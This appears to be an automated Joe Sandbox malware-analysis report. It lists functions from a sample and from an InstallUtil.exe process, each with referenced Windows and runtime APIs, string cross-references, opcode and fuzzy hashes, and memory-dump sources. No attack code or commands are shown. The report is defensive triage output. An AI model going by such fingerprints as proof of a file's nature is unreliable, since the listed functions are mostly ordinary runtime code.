API String ID: 4061214504-1276376045
Opcode ID: 1aec9ac076efe8edc899d953d0403419496c684b90549594258ef54732c96e69
Instruction ID: bf217fa0080ba38955451211836a91c2d7e1c6235cb3d7e1c17c026a32f979ad
Opcode Fuzzy Hash: 1aec9ac076efe8edc899d953d0403419496c684b90549594258ef54732c96e69
Instruction Fuzzy Hash: 9001A235914655AFEB228F95DC05BAFBBBCFB44B18F000529F915A2384DB74A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0133D205 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0133D28C
__alloca_probe_16.LIBCMT ref: 0133D34D
__freea.LIBCMT ref: 0133D3B4

Part of subcall function 01337E20: RtlAllocateHeap.NTDLL(00000000,00000000,013369EF,?,0133D85F,?,00000000,?,01342A90,00000000,013369EF,00000000,?,?,?,013367E9), ref: 01337E52

__freea.LIBCMT ref: 0133D3C9
__freea.LIBCMT ref: 0133D3D9

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 53b8328d80e573be49594a4f3470532241a10424b3bd5513a1f81801cf6899ff
Instruction ID: a9ec041a7ec74b887f1a08af2d9f1dd82a1cacee2a0916bab4a4bdcea35b0c78
Opcode Fuzzy Hash: 53b8328d80e573be49594a4f3470532241a10424b3bd5513a1f81801cf6899ff
Instruction Fuzzy Hash: 0151937260021BAFEF255FE8DC81EBF7AA9EF94628B550129FD04D7150E770CD108768

Uniqueness

Uniqueness Score: -1.00%

Function 01325130 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01325150
std::_Lockit::_Lockit.LIBCPMT ref: 0132516E
std::_Lockit::~_Lockit.LIBCPMT ref: 0132518F
std::_Facet_Register.LIBCPMT ref: 013251F4
std::_Lockit::~_Lockit.LIBCPMT ref: 0132520D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 7e28ca3c9a95c090ebf0f8f6682c38540281473c552b72dafae7c652949986dc
Instruction ID: e445871f418f81a9c2cb2d7c80639664d52a2027f46a6346e1bc8c397f6302c2
Opcode Fuzzy Hash: 7e28ca3c9a95c090ebf0f8f6682c38540281473c552b72dafae7c652949986dc
Instruction Fuzzy Hash: 5231F4725013268FCB31FF18D88096AB7A1FF94628F15050DE8496B262D730FE09CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01328170 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 01328177
std::_Lockit::_Lockit.LIBCPMT ref: 01328181

Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69

codecvt.LIBCPMT ref: 013281BB
std::_Facet_Register.LIBCPMT ref: 013281D2
std::_Lockit::~_Lockit.LIBCPMT ref: 013281F2

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 40b59fed227d7e6f1a6f26126f9b6f709edd38159957de37000f50429599b977
Instruction ID: aa96325d70873f1f9b5ea9feed682981716f67d9e90b5678a2cb90a0af9c0e71
Opcode Fuzzy Hash: 40b59fed227d7e6f1a6f26126f9b6f709edd38159957de37000f50429599b977
Instruction Fuzzy Hash: 2501D2319002369FCB15FBACC844AAE7FB5BF60728F240589D8056B3D0DF70AA008790

Uniqueness

Uniqueness Score: -1.00%

Function 013268D2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 013268D9
std::_Lockit::_Lockit.LIBCPMT ref: 013268E3

Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69

codecvt.LIBCPMT ref: 0132691D
std::_Facet_Register.LIBCPMT ref: 01326934
std::_Lockit::~_Lockit.LIBCPMT ref: 01326954

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: eceb4184c58b403e327f0c8fe69987a52de8fdd502ac5b6504251081efb0d230
Instruction ID: 0eb1dd94d111f3d666d4163a55939fa8f843ddfc6573e625d78cc4757f03bd6e
Opcode Fuzzy Hash: eceb4184c58b403e327f0c8fe69987a52de8fdd502ac5b6504251081efb0d230
Instruction Fuzzy Hash: 9501D271E002369FCB15FB68C555AAE7B75AF5076CF240509D801AB390DF70AE048B90

Uniqueness

Uniqueness Score: -1.00%

Function 013220C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0132215D

Part of subcall function 0132A8B0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,?,013267B6,?,01354BA0,?,?,?,ios_base::failbit set), ref: 0132A910

Strings

ios_base::badbit set, xrefs: 013220F7, 01322122, 01322140
ios_base::failbit set, xrefs: 01322022, 01322101
ios_base::eofbit set, xrefs: 01322106

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6c4bcec0a9c9c44b0f3639795052fd62bef16fec833625b3d626ab15e8726a6a
Instruction ID: 574b491ad71b58b688f6bdd28245b78eb1f36f66acd36324a88b25d57b6305ac
Opcode Fuzzy Hash: 6c4bcec0a9c9c44b0f3639795052fd62bef16fec833625b3d626ab15e8726a6a
Instruction Fuzzy Hash: 5911E4B6900715ABC710EF5CCC01F96BBE8BF15218F04C91AEA5897640F774E558CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132DF82 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0132DF33,00000000,?,0145A95C,?,?,?,0132E0D6,00000004,InitializeCriticalSectionEx,01349CE8,InitializeCriticalSectionEx), ref: 0132DF8F
GetLastError.KERNEL32(?,0132DF33,00000000,?,0145A95C,?,?,?,0132E0D6,00000004,InitializeCriticalSectionEx,01349CE8,InitializeCriticalSectionEx,00000000,?,0132DE8D), ref: 0132DF99
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0132DFC1

Strings

api-ms-, xrefs: 0132DFA6

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 5131509da94d8e45e89959edc78a8c7dd3fc9cd7e10ff9b7ee5031f113de9996
Instruction ID: 247476e5a05b0b061a80d403be69b7fb228503f12ea01c26acf08480463a379e
Opcode Fuzzy Hash: 5131509da94d8e45e89959edc78a8c7dd3fc9cd7e10ff9b7ee5031f113de9996
Instruction Fuzzy Hash: 73E04F34294204B7EF217AE5EC06F193F58AB01B49F104060FD0CE8495DB61E5689A8C

Uniqueness

Uniqueness Score: -1.00%

Function 0133A22E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(51F7B458,00000000,00000000,?), ref: 0133A291

Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0133A4EC
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0133A534
GetLastError.KERNEL32 ref: 0133A5D7

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: e95ad45c8ee54167dafa96199fd04851b9bd134187ec15cd791574ea2b537e12
Instruction ID: c41ecc9e89094aa95ea6504ef3cdf2bb19a36223c07355ecc3141d169a432f2e
Opcode Fuzzy Hash: e95ad45c8ee54167dafa96199fd04851b9bd134187ec15cd791574ea2b537e12
Instruction Fuzzy Hash: 5AD18AB5D00248DFDF15CFA8D8809ADBBB5FF48318F18412AE996EB341E730A945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0133F0F7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87

GetLastError.KERNEL32 ref: 0133F15B
__dosmaperr.LIBCMT ref: 0133F162
GetLastError.KERNEL32(?,?,?,?), ref: 0133F19C
__dosmaperr.LIBCMT ref: 0133F1A3

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 77cbb61af2ef8975b6c7c616cf395401c4ec6918a6a2f36573055f66f641286a
Instruction ID: c1a2c9cdf0dd50e93a94a134b8a4ac3b611c73bf1b4b5f64ca8d482eafbc3a2c
Opcode Fuzzy Hash: 77cbb61af2ef8975b6c7c616cf395401c4ec6918a6a2f36573055f66f641286a
Instruction Fuzzy Hash: FB21AA71F00606AFDB21AF79EC8086BB7ADEFC526C7404519F81597541D731EC418799

Uniqueness

Uniqueness Score: -1.00%

Function 01334129 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d127631b6a3039c734eb14d246d4a7b961b6f3ad2ff811b7a3ad4f42d53710f
Instruction ID: 00eef3a9376137a08a11e0421be660a8901fa15eb44351a9957d45042e3ecd29
Opcode Fuzzy Hash: 6d127631b6a3039c734eb14d246d4a7b961b6f3ad2ff811b7a3ad4f42d53710f
Instruction Fuzzy Hash: 7021A879B00A06AFDB21AF79DC8086BB7ADEFE026C7004525F925D7560DB31ED80C768

Uniqueness

Uniqueness Score: -1.00%

Function 0134008D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,013348AD,00000000,01334880,01334B1E,01329C23,01354E48,00000014), ref: 01340095

Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 013400CD
FreeEnvironmentStringsW.KERNEL32(00000000,00000000), ref: 013400ED

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 402c39cdfb6635f052e5e9b728e940bb44e0ce35e9883e1fa21ab0c2fd3daba5
Instruction ID: 938c0da21c8c8afbb16e70259cd768d2be7265e051edc8beee4b78630d9e86a2
Opcode Fuzzy Hash: 402c39cdfb6635f052e5e9b728e940bb44e0ce35e9883e1fa21ab0c2fd3daba5
Instruction Fuzzy Hash: B01196F560151ABFE72537B99C89CFF79DCEE992AC7000125FA05E1100FE64ED0146B9

Uniqueness

Uniqueness Score: -1.00%

Function 01346606 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000), ref: 0134661D
GetLastError.KERNEL32(?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?,?,?,0133ABB2,?), ref: 01346629

Part of subcall function 013465EF: CloseHandle.KERNEL32(FFFFFFFE,01346639,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?,?), ref: 013465FF

___initconout.LIBCMT ref: 01346639

Part of subcall function 013465B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,013465E0,01344AE4,?,?,0133A62B,?,00000000,00000000,?), ref: 013465C4

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?), ref: 0134664E

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6c9dc9ffdbab53fc71813b55c0f9d1e4d57cbad0af24811c8c05aa415b8c4a20
Instruction ID: 172fd4524a30bb6399ef02947f7353a9075668699dea0c8bf1c63d8688aeba31
Opcode Fuzzy Hash: 6c9dc9ffdbab53fc71813b55c0f9d1e4d57cbad0af24811c8c05aa415b8c4a20
Instruction Fuzzy Hash: 56F030B6510119FBCF722FE5EC069893F6AFB097B4F408050FE1985124CA32A960EFD4

Uniqueness

Uniqueness Score: -1.00%

Function 01333B9D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 01333C2D

Strings

pow, xrefs: 01333C05, 01333C22

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a365e3149297f2098c4a5885e59b666fb08fb5f1b4f0fa73f23f0e9d8a628412
Instruction ID: ef4efa6516ee6f6715f5865135812bf91ae4e5f24e2b944627eadf731cc1a662
Opcode Fuzzy Hash: a365e3149297f2098c4a5885e59b666fb08fb5f1b4f0fa73f23f0e9d8a628412
Instruction Fuzzy Hash: C8517F61E0920696EF26771DC90037A6F98BBC0758F24CD79E0D1422E9EF3984D59B4E

Uniqueness

Uniqueness Score: -1.00%

Function 01322010 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0132215D

Part of subcall function 0132A8B0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,?,013267B6,?,01354BA0,?,?,?,ios_base::failbit set), ref: 0132A910

Strings

ios_base::badbit set, xrefs: 013220F7, 01322122, 01322140
ios_base::failbit set, xrefs: 01322022

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: d99aa70859b9c488328d9866721e82ef5f9d695b7bb1826cfffc289312954df3
Instruction ID: ad6aad80ebd112cb53b92439fa194afa634cf0b98abfb3cf06a9fbff5543c942
Opcode Fuzzy Hash: d99aa70859b9c488328d9866721e82ef5f9d695b7bb1826cfffc289312954df3
Instruction Fuzzy Hash: 1F414676504315AFC318EF2CCC40AABBBE9EF99218F14CA1EF95487640E734E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0132CC40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0132CC7F
__IsNonwritableInCurrentImage.LIBCMT ref: 0132CD33

Strings

csm, xrefs: 0132CD1D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 3c35d4075a9a987d7a03ab2be7872ca819447f074baa23409ce5a0e491f8bc68
Instruction ID: 102e559a9f0e3d85405c8d1e0c96169eba60620a1b625e3f47573c249b1bda14
Opcode Fuzzy Hash: 3c35d4075a9a987d7a03ab2be7872ca819447f074baa23409ce5a0e491f8bc68
Instruction Fuzzy Hash: 95418334A002299BCF10EF6CC884A9EBFB5BF5532CF148155E919AB351D771E916CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0132D54D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0132D572

Strings

RCC, xrefs: 0132D58C
MOC, xrefs: 0132D584

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 95968ac41cf4bf9d98f772b9fedd79bbaa1bce30382b2845e599dfdba71ec0a3
Instruction ID: 7a25ca06e2ef270eb3091e2565534966531066f46006d066851654d0198ba364
Opcode Fuzzy Hash: 95968ac41cf4bf9d98f772b9fedd79bbaa1bce30382b2845e599dfdba71ec0a3
Instruction Fuzzy Hash: 09417A71900219EFDF26EF98CC80AEEBBB5FF48318F188059FA08A7251D3359A50DB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 6752, Parent PID: 6684COMMON

Executed Functions

Function 029C453E Relevance: 23.5, Strings: 18, Instructions: 1044COMMON

Download Yara Rule

Strings

$Jq, xrefs: 029C45BB
}, xrefs: 029C5325
}, xrefs: 029C575A
\, xrefs: 029C46B5
{, xrefs: 029C5717
{, xrefs: 029C52E2
cJq, xrefs: 029C4A50
[, xrefs: 029C4C2F
", xrefs: 029C4B04
], xrefs: 029C4F09
PlJq, xrefs: 029C4E17
], xrefs: 029C4C72
4'Jq, xrefs: 029C5681
u, xrefs: 029C47C7
LRJq, xrefs: 029C4664
cJq, xrefs: 029C49B2
[, xrefs: 029C4EC6
$Jq, xrefs: 029C5263

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: "$4'Jq$LRJq$PlJq$[$[$\$]$]$u${${$}$}$$Jq$$Jq$cJq$cJq
API String ID: 0-2015809238
Opcode ID: 26bc45a2dbb9473da1e23ed9e6a7ab37e63bff54ef25f1c1897776bc0fe113ae
Instruction ID: a1b9203dfed0628c4178af008a4abcedd2c1156bcc3b713776256b566b53bdbd
Opcode Fuzzy Hash: 26bc45a2dbb9473da1e23ed9e6a7ab37e63bff54ef25f1c1897776bc0fe113ae
Instruction Fuzzy Hash: 6EB29E74905228CFDB65DF29C888BADBBB6BB49305F2485EAD40DA7250DB309EC1CF41

Uniqueness

Uniqueness Score: -1.00%

Function 029C5AE8 Relevance: 9.2, Strings: 7, Instructions: 447COMMON

Download Yara Rule

Strings

", xrefs: 029C5F8F
}, xrefs: 029C5BDF
-, xrefs: 029C6079
[, xrefs: 029C5DD7
{, xrefs: 029C5B9F
], xrefs: 029C5E17
", xrefs: 029C5F4F

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: "$"$-$[$]${$}
API String ID: 0-2220975799
Opcode ID: bf8a8c1a9d1c1c83e9b42ebf5aa279bcdf4675acff1e97020f4e15f8517f4f39
Instruction ID: e0af3c2ed732d5dc003c749025c67496ed70803e62a5bef71f1d385adf14430f
Opcode Fuzzy Hash: bf8a8c1a9d1c1c83e9b42ebf5aa279bcdf4675acff1e97020f4e15f8517f4f39
Instruction Fuzzy Hash: 2122AE74D05229CFDB64DFA9C940BADBBB2AB89300F2085EAD409B7255DB359E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 029C8F20 Relevance: 3.5, Strings: 2, Instructions: 962COMMON

Download Yara Rule

Strings

fOq, xrefs: 029C9537
U, xrefs: 029C94B3, 029C94B8

Memory Dump Source

Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd

Similarity

API ID:
String ID: fOq$U
API String ID: 0-3532095693
Opcode ID: 0974ff3c9f3ac667fdfe157b43e70fbf0df925dc61a1cb07151a02e411caa1f9
Instruction ID: 65f3cc53766682ad184729248b593bfff583452b711d20ee46fb4f5b3c2452b5
Opcode Fuzzy Hash: 0974ff3c9f3ac667fdfe157b43e70fbf0df925dc61a1cb07151a02e411caa1f9
